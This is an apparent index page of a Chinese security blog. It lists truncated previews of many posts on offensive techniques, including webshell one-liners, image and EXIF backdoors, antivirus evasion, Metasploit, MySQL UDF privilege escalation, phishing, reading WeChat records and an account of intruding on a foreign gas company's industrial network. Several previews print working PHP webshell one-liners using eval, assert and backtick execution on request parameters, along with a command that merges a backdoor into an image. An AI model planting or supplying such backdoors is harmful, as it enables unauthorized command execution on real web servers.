
逆向漏洞
Coisini、
9点睡9点起 每天工作6小时
展开
-
灰色产业链成病毒传播最大渠道 流量生意或迎来最后的疯狂
咳咳 嗯 有段时间的 最近吗 都放暑假了 没有什么好更新的 最近我们都在关心2020微软的更新问题 对我们的这类人还是有些要求的我也不想到时候大家再跌跟头 吃亏什么的 今天就讲解一下吧 声明:我暑假是有别的事在做 很少更新 大家可以去我微信或者论坛留言我会挑一些来回答【快讯】劫持浏览器、刷取流量等行为是流氓软件常见行为,而随着安全厂商持续打击、普通用户的安全意识提升,让病毒团...原创 2019-07-26 13:24:48 · 1536 阅读 · 1 评论 -
互联网漏洞批量扫描框架的搭建
0x00 前言每次漏洞爆发之后,很多人都在急着找批量,想着能多刷几个洞提交乌云上。其实有些漏洞的探测步骤很多时间是可以统一抽取做成框架的。今天我就分享一下自己写的一个漏洞批量利用的框架,运用这个框架,可以方便的进行一些漏洞的批量扫描。0x01 框架的原理漏洞的扫描一般都是URL链接挂载一个POC或者有人更狠直接上exp来尝试访问,如果服务器返回的页面中存在一些特征的字符串,那么就判定该...原创 2019-06-16 14:19:27 · 912 阅读 · 0 评论 -
浅谈路由器漏洞挖掘(科普文)
想在国内找一些路由渗透的纪实,但还是木有什么结果,就是今晚给国内某路由厂商提交一些漏洞时,还被人家鄙视了,哎。什么狗屁心态。不管了,留给我未来的 儿子玩吧。说不定可以搞出什么东西。呵呵,扯远了,今晚就结合国外的一些科普文做一些讲解吧。大牛别喷我,我也只是自己写写笔记意淫意淫….别喷!++++++我是淫荡的分割线++++++++一,为什么要定义单独的路由安全?(1)对于渗透湿而言:如今,更多...原创 2019-06-16 14:16:00 · 4303 阅读 · 1 评论 -
Linux提权的一个问题:/bin/bash^M: bad interpreter: No such file or directory
执行一个脚本 exploit.sh 时, 一直是提示我: -bash: ./exploit.sh: /bin/bash^M: bad interpreter: No such file or directory出现上面错误的原因之一是脚本文件是DOS格式的, 即每一行的行尾以\r\n来标识, 使用vim编辑器打开脚本, 运行::set ff?可以看到DOS或UNIX的字样. 使用...原创 2019-06-16 13:52:37 · 409 阅读 · 0 评论 -
渗透thinksns官网
(本文涉及的所有漏洞已经被修复!)(由于文章是后来补写的,有些图可能无法抓到。sorry)ThinkSNS(简称TS),开源微博引擎。一直都在看thinksns的代码,但是由于很彩笔,一直没找到什么实质的漏洞,某天在90sec上,看到某黑阔发的thinksns注入0day,看了下,是一个插件的注入,注入点:index.php?app=blog& mod=Index&act...原创 2019-06-16 13:36:17 · 526 阅读 · 0 评论 -
Hacking PostgreSQL
这篇文章主要讲解了如何 Hacking PostgreSQL 数据库,总结了一些常用方法。0x01 SQL 注入大体上和 MySQL 差不多,有一些变量不一样。具体就不再举例,可以看这篇总结:PostgreSQL SQL Injection Cheat Sheet。此外,利用 sqlmap 也是一个不错的方式。0x02 执行命令sqlmap 给出的几个 UDF 在我本地测试并不成功,所...原创 2019-06-15 22:55:49 · 191 阅读 · 0 评论 -
分享一个jsonp劫持造成的新浪某社区CSRF蠕虫
最近jsonp很火,实话说已经是被玩烂了的,只是一直没有受到大家的重视。正好在上个月,我挖过一个由于jsonp造成的新浪某社区CSRF,当时是为了准备一篇文章,之后这篇文章也会拿出来分享。因为新浪已经修复了问题,所以我先把这个漏洞分享出来。以下是当时写的部分文章。0x01 引子听说新浪五月送衣服,我其实也没太多空去挖洞。本来想交一个两年前挖的CSRF刷粉,结果拿出来一看那洞早没了,目标站都...原创 2019-06-15 22:12:14 · 475 阅读 · 0 评论 -
SSH端口中转全攻略_基础篇
0x01 -L参数命令:ssh -L5432:host_A:12345 ApacheServer@host_B作用:将本地机(客户机)的某个端口转发到远端指定机器的指定端口.工作原理:本地机器上分配了一个 socket 侦听 port 端口(5432端口), 一旦这个端口上有了连接, 该连接就经过本地计算机与远程计算机host_B的安全通道转发出去, 此时本地主机与远程主机之间的通信...原创 2019-06-15 22:04:45 · 2274 阅读 · 0 评论 -
Package 钓鱼
0x00 前言前几天 Samba 公开了一个远程代码执行的漏洞,然后各种 POC 也随之出现, exploit-db 上也有这样一个 Python 版本的 POC: Samba 3.5.0 - Remote Code Execution.直接执行 POC,报错误信息:这种情况非常简单,直接 pip install smb 就行,但是:好吧,我们还是需要 Google 一下这个 smb ...原创 2019-06-04 12:28:44 · 384 阅读 · 0 评论 -
SQLMAP源码分析Part1:流程篇
0x00 概述1.drops之前的文档 SQLMAP进阶使用介绍过SQLMAP的高级使用方法,网上也有几篇介绍过SQLMAP源码的文章曾是土木人,都写的非常好,建议大家都看一下。2.我准备分几篇文章详细的介绍下SQLMAP的源码,让想了解的朋友们熟悉一下SQLMAP的原理和一些手工注入的语句,今天先开始第一篇:流程篇。3.之前最好了解SQLMAP各个选项的意思,可以参考sqlmap用户手册...原创 2019-06-15 18:04:15 · 1117 阅读 · 0 评论 -
一句话木马(最新免杀php后门一句话)
各位同学 对 一句话木马 我写了第5篇了,没有绝对的安全 我们在完善中!啊哈哈这段代码 可以被利用做后门 暂时免杀。代码:<?php //t.php $test = $_GET['r']; echo `$test`; ?>大家看看这个代码有木有问题?我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么...原创 2019-06-15 17:13:24 · 15164 阅读 · 0 评论 -
XSS 前端防火墙 —— 整装待发
到目前为止,我们把能用前端脚本防御 XSS 的方案都列举了一遍。尽管看起来似乎很复杂累赘,不过那些是理论探讨而已,在实际中未必要都实现。我们的目标只是为了预警,能发现问题就行,并非要做到滴水不漏的程度。事实上,HTML5 早已制定了一套浏览器 XSS 解决方案 —— Content Security Policy,并且大多主流浏览器实现了这个标准。既然我们使用前端脚本重新实现一遍,因此得在...原创 2019-06-15 17:07:00 · 264 阅读 · 0 评论 -
理工渣眼中的HMM及安全应用
虽然是理工妹子,但仍是数学渣。症状之一就是每次学习算法都能把自己绕成鸡窝头。所以尝试写一篇数学渣眼中的HMM。我们先看一个让人头疼的HMM定义式(喜欢从公式下手是我多年来应付考试养成的不良习性)一、HMM五元素HMM简介 - 碳基体 - 碳基体N:隐藏状态数 hidden statesM:观测状态数 observed statesA: 状态转移矩阵 transition matri...原创 2019-06-15 16:52:43 · 473 阅读 · 0 评论 -
盛大渗透全纪实之SVN猎手
本想着扫点81端口服务器能对下一步渗透有所帮助。。 结果发现这个目标段上站点并不多。。 整个段上貌似只有这一个站和一个数据库服务器是活的 = =so,再次改变思路。。用某二级域名查询工具导出了一份盛大的站点,进行普扫。。。---------------其中发现了bbsdk.sdo.com的一处源码备份不过看了一会儿 貌似又是一个已下线的站。。半小时以后,扫描结果出来。即使一些站有...原创 2019-06-09 16:40:17 · 363 阅读 · 0 评论 -
用ZendGuard 加密php webshell
现在很多linux管理员都会一招,grep eval 大法,查找那些年错过的webshell,那些年错过的基友们苦思冥想出了对抗的办法。ZendGuard是一款php的加密工具,它可以编译php源码变为字节码,类似于java的虚拟机的字节码,然后让zend虚拟机运行字节码,以此来提高php的运行速度,因为不用虚拟机,php运行脚本的方式是读一行代码,运行一行,效率很低,而虚拟机则效率高多了,题...原创 2019-06-09 16:31:52 · 523 阅读 · 0 评论 -
Use MSBuild To Do More(渗透中MSBuild的应用技巧)
最近Casey Smith@subTee更新了一系列关于”MSBuild”的研究进展,对我有很大启发。本文将基于他公开的POC,并结合我的研究心得,介绍以下MSBuild的应用技巧:Execute PowerShell CommandsExecute PE fileExecute ShellcodeVisualStudio Persistence0x01 简介MSBuild是Mic...原创 2019-06-09 16:28:37 · 355 阅读 · 0 评论 -
一个悲情的故事:我扫遍全网只为知道你的真实IP
事先声明: 方法可能存在漏报(嗯, 在人品差的情况下)唔, 我们使用 www.wooyun.org 作为案例。首先从 www.wooyun.org 服务多次挂的页面可以看出, wooyun 使用了 baidu 的 cdn 服务, 从 wooyun 的漏洞案例上也可以知道 wooyun 使用了 ucloud 的服务, 我们可以大胆假设 wooyun 服务器的 ip 在中国内.0x1...原创 2019-06-17 16:48:06 · 616 阅读 · 1 评论 -
PHP图片后门藏匿攻略
我们平时藏匿图片后门是什么流程呢?我们来看一下0x01 初级的藏匿方法:1、建立一个eval.php文件,上面加入我们的后门:<?php assert($_POST[feiji]);?>2、找一张图片1.jpg,最好是从目标网站上下载下来的图片。3、合并图片和php后门:Copy /b C:\xampp\htdocs\images\1.jpg + C:\xampp\ht...原创 2019-06-21 17:06:48 · 1960 阅读 · 0 评论 -
闲谈 bypass AV
孩纸,看到AV别乱想~这里说的AV是AntiVirus。即杀软。(这些日子考试繁重,更的少了…)本篇文章简单说一下本人平时常用的免杀工具以及其使用~0x00 Hyperion第一个说说这个 Hyperion,因为比较轻量级~,为什么说轻量级呢,因为,360杀毒能检测出。。其实 Hyperion 是一款加密工具,通过5轮AES加密来加密的你payload,加密完成后的payload是可以...原创 2019-06-23 19:46:29 · 5004 阅读 · 0 评论 -
Metasploit => tips, tricks, hashes and tokens
metasploit在渗透测试中经常被用到,实际上这套软件包括了很多工具,这些工具组成了一个完整的攻击框架.metasploit或许在渗透测试中的每一方面都不能称为最好用的工具,但是这个工具有它自己的方便之处.这篇文章中,我会演示在一次渗透测试中我们会经历哪些步骤,并且我会故意的只使用metasploit来完成这些工作,以此来显示metasploit的威力所在.渗透测试中不能仅仅依赖工具,...原创 2019-06-23 16:22:19 · 218 阅读 · 0 评论 -
一种隐藏在JPG图片EXIF中的后门
哎,怎么说呢!对本章第七次,我多次强调一句话的意义是为了大家熟悉网络安全环境,注意防范几天前,我们研究团队的 Peter Gramantik 在一个被攻破的网站上发现一个非常有趣的后门。这个后门并没有依靠正常模式去隐藏起内容(比如 base64/gzip 编码),但是它却把自己的数据隐藏在 JPEG 图片的 EXIT 头部中了。它也使用 exif_read_data 和 preg_repla...原创 2019-06-23 16:07:53 · 802 阅读 · 0 评论 -
Linux MySQL Udf 提权
前几天做一个小竞赛中有一个题目:给定的测试环境登录页面有POST注入漏洞,于是果断操起sqlmap跑数 据,无意中发现当前MySQL连接用户为root,于是想到udf提权「虽然Windows下MySQL提权基本上没问题,但是Linux环境下原来一直 没成功过。」,最终成功获取root权限「主要问题在于MySQL是以root权限运行」,记录笔记如下,方便以后查阅:具体步骤如下找到MySQL插件...原创 2019-06-12 14:05:07 · 2334 阅读 · 0 评论 -
Oracle弱口令渗透五部曲!
1.NMAP 扫描开放的常见端口,nmap4.9版本已经支持oracle tns 版本探测,可以方便的知道oracle版本信息2.查找sid信息,可以通过访问isqlplus,使用账户dbsnmp/dbsnmp/来登录 这里oracle设计的isqlplus有一个Bug可以不需要输入sid信息来登录,然后执行查询语句得到sid3.得到SID后呢,使用sqlplus登录,通常的话用sco...原创 2019-06-12 13:45:36 · 1092 阅读 · 0 评论 -
木马伪装“刷单任务” 劫持QQ语音暗中盗号
近日,360 QVM团队发现一类QQ盗号木马异常活跃。该木马通过QQ语音(QTalk)在网购刷单人群中大肆传播,并劫持Qtalk的文件隐蔽运行,通过弹出虚假的QQ语音登录框实施盗号。此木马限于QTalk用户之间传播,淘宝刷单者常“驻扎”在QQ语音的房间内,等待接单。而不法分子则伪装为淘宝卖家,与刷单者加为QQ好友,并向其发送由木马伪装的“刷单任务”,伺机窃取刷单人群的QQ账号和密码。360...原创 2019-06-12 13:37:15 · 2470 阅读 · 1 评论 -
快速穷举TCP连接欺骗攻击-利用SYN Cookies
TCP 利用 32比特的 Seq/Ack 序列号来确认每一个连接的可靠性. 此外, 这些32位的序列号还能保证服务器不会被会话劫持,伪造一个服务器发出的初始序列号(ISN) 是个难以实现的技术. 因为暴力破解的话需要穷举这个32比特的序列号,在一个千兆比特级别的网卡上也是很难实现的. 今天的文章将为大家带来是如何利用 TCP SYN Cookies (一项广泛使用的用来防止SYN-Floodi...原创 2019-06-12 13:28:43 · 478 阅读 · 1 评论 -
bug bounty – 绕过限制劫持Skype账号
版权声明:本文为博主原创文章,未经博主允许不得转载。0x00 前言在使用outlook的过程中,我意外发现了一个URL:https://webdir.xxx.lync.com/xframe。并在这个页面中发现了一处监听message时间的监听器。通过阅读代码,发现过程如下:(1)接受外界的message,抽取出URL,type(类似于command指令),以及一些data、header...原创 2019-06-12 13:22:59 · 652 阅读 · 0 评论 -
[MSSQL] 重建密碼一樣的帳號
因為SQL Server 2005即將結束服務(EOS),所以公司內有一些比較重要的系統就有考慮要進行升級或移轉服務,User也希望經過測試再進行正式的服務移轉,因此通常會另外安裝新機,而不會原機升級,在資料庫中可能有不少的系統帳號需要移轉,就可以透過以下方法來進行…要還原帳號,不外乎是還原原先的權限以及建立一樣的密碼,通常帳號在幫User建立,密碼交出去之後應該也忘光了(有建立密碼原...原创 2019-06-12 13:18:31 · 194 阅读 · 0 评论 -
PHP后门隐藏与维持技巧
0x00前言在一个成功的测试后,通常会想让特权保持的更久些.留后门的工作就显得至关重要,通常布设的后门包括但不限于数据库权限,WEB权限,系统用户权限等等.此文则对大众后门隐藏的一些思路做科普.以PHP-WEBBACKDOOR为例,抛砖引玉一个最常见的一句话后门可能写作这样<?php @eval($_POST['cmd']);?>或这样<?...原创 2019-06-12 13:14:20 · 518 阅读 · 0 评论 -
安全威胁情报之HackingTeam邮件分析
HackingTeam事件发生以来,很多Team与个人都对暴露出的数据进行了分析,挖掘出了很多的0dayExploit、RCS机制、UEFIRootkit等等,很多从技术上展开了深入分析,对邮件也有全部导出公布到网上供查询和浏览的(虽然可以查询和浏览,但不够方便),除了0Day漏洞、漏洞利用技术、远程控制技术以外,邮件其实有很多值得分析,能够挖掘出有意思的情报信息。当然,对于不同的技术人员...原创 2019-06-12 12:54:21 · 1488 阅读 · 0 评论 -
旁注虚拟主机IIS权限重分配跨目录得webshell
国内的IDC运营商最常见的模式就是IIS搭配解析asp,有星外,新网,西数,华众等等。。。这些虚拟主机提权都是相当难。最近小生在和习科核心渗透群里的一次渗透测试中,就遇到了一次,这里讲一下。I)前奏旁注,同服,虚拟主机服务器,只支持asp解析,aspx和php都不支持最幸运的是,这个虚拟主机居然忘了禁用wscript但是服务器上装了流氓软件360和杀毒软件诺顿,虽然我不太理解流氓软...原创 2019-06-12 12:48:45 · 329 阅读 · 0 评论 -
一张图片即可入侵你的电脑
续前几周写的一句话木马如何使用一张看起来十分正常的可爱猫咪或美女图片,可以把恶意代码隐藏在图片像素中。当你点击这张图片时,计算机便会中招。印度安全研究人员萨米尔·沙哈把他发现的这种隐藏恶意程序的方法称为“stegosploit”,只需看一眼被这种方法处理过的图片文件,你就会被黑掉。沙哈在上周四荷兰阿姆斯特丹的黑客会议(HITB)上讲解了这项黑客技术。“恶意程序是一门艺术。”...原创 2019-06-12 12:43:56 · 3094 阅读 · 0 评论 -
网站被黑前你能做些什么?
目前大多数公司并没有专门的人员,担任此类工作的基本都是对网络安全不是很专业的程序人员和人员。即使有些公司配置有专业的人员,但毕竟个人力量有限,网络安全是一个整体规划的过程。因此必须重视网络,做全面的安全评估及跟进,这样做的好处是:排除已知网络隐患,预防潜在安全危机,把可能带来的风险降到最小。特别对于一些靠网站运营生存的企业,稳定的服务及网站将会直接影响经济效益。”目前被黑的大部网站主要有以...原创 2019-06-13 11:22:05 · 245 阅读 · 0 评论 -
WAF指纹探测及识别技术
Web应用防护系统(也称:网站应用级入侵防御系统。英文:Web Application Firewall,简称: WAF)。利用国际上公认的一种说法:Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。本文 介绍了常见的WAF指纹识别的一些技术,详见如下:WAF指纹Cookie值Citrix Netscaler“Citrix Netsc...原创 2019-06-21 17:40:43 · 2326 阅读 · 0 评论 -
解析常见的VLAN攻击
VLAN攻击手段是黑客基于VLAN技术应用所采取的攻击方式,面对这些花样翻新的攻击手段,如何采取有效的防范措施?在本文中,将针对应用VLAN技术管理的网络,介绍黑客的攻击手段和我们可以采取的防御手段。目前常见的VLAN的攻击有以下几种:VLAN攻击1.802.1Q 和 ISL 标记攻击标记攻击属于恶意攻击,利用它,一个 VLAN 上的用户可以非法访问另一个 VLAN 。例如,如果将交换机端...原创 2019-06-09 16:19:18 · 4460 阅读 · 1 评论 -
winrar“秒破”尝试与原理简介
第一步:用winhex将下面数据生成rar格式的文件。526172211A0700CF907300000D0000000000000056947424965E00600000004900000002E3B1696DEE413D3B1D33310020000000C3EBC6C6B2E2CAD44279CCECD2D76C6F76652E74787400796AD234784B6DD58B0A...原创 2019-06-09 16:18:10 · 3672 阅读 · 1 评论 -
渗透某国工业系统
0×00:某国group是某国主要的燃气输送公司。其重要性可想而知,所有燃气管道的工控系统都是在group内部网络里。0×01:上次我发了渗透某工业系统的文章,被人误以为是“有关部门”的工作人员。在下强调一下,我只是个菜鸟,我有自己的工作和生活,这些也是我业余时间的个人爱好,所以请看官们别乱猜想。本人技术有限,也是属于菜鸟级别的。所以文章写的不好看官们请勿喷,因为我只想把自己懂的一些来...原创 2019-06-09 16:15:15 · 205 阅读 · 0 评论 -
如何获取安卓iOS上的微信聊天记录、通过Metasploit控制安卓
在这篇文章中我们将讨论如何获取安卓、苹果设备中的微信聊天记录,并演示如何利用后门通过Metasploit对安卓设备进行控制。文章比较基础、可动手性强,有设备的童鞋不妨边阅读文章边操作,希望能激发大家对移动终端的安全兴趣。“如何获取android、iPhone手机上的微信聊天记录? ”0×00 条件:安卓设备已获取root权限,安装SSHDroid(通过ssh、ftp连接手机)App...原创 2019-06-12 14:24:27 · 956 阅读 · 0 评论 -
我是如何诱骗你的-高级钓鱼技术
经常有人问我如何进行钓鱼。email钓鱼是种很吸引人的攻击。成功实施一次email钓鱼需要有非常系统的方法。其中,前期准备阶段占用了整个攻击的大部分时间。一个安全的邮件收发系统建立在多层次的架构之上,因此我们的钓鱼邮件有可能会被不同层次的安全层过滤掉。其中包括Email网关垃圾邮件过滤器、Outlook的“Junk Email”过滤器、杀毒软件、PS(入侵防御系统)、Web代理服务器、外出过滤...原创 2019-06-05 20:18:46 · 682 阅读 · 0 评论 -
社会工程学攻击的三个典例
Chris Hadnagy是靠”骗人”来领薪水的;这么多年来,他练就了一套炉火纯青的骗人功夫。Hadnagy是社会工程学攻击网站social-engineering.org的创办人之一,并且著有《社会工程学:人力黑客艺术》一书,十多年来他一直在使用操纵策略,向客户表明犯罪分子在如何窃取信息。Hadnagy在其新书中大致介绍了三种典型的社会工程学攻击测试,并指出了企业可以从这些结果中汲取到什么教...原创 2019-06-05 19:48:59 · 21305 阅读 · 0 评论 -
上传漏洞-一句话木马
声明:为什么又写一篇关于一句话木马,对,我第一次没写明白,直写了一句话木马的简单制作,但是还是有很多同学真的看不懂,所以我今天改一下,这次精写!上传漏洞-一句话木马讲述内容:一句话木马 木马使用技巧(中国菜刀、C32、CKnife)简介:一句话木马一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用往目标网站中加入一句话木马,然后你就可以在本地通过...原创 2019-05-30 20:52:07 · 8763 阅读 · 0 评论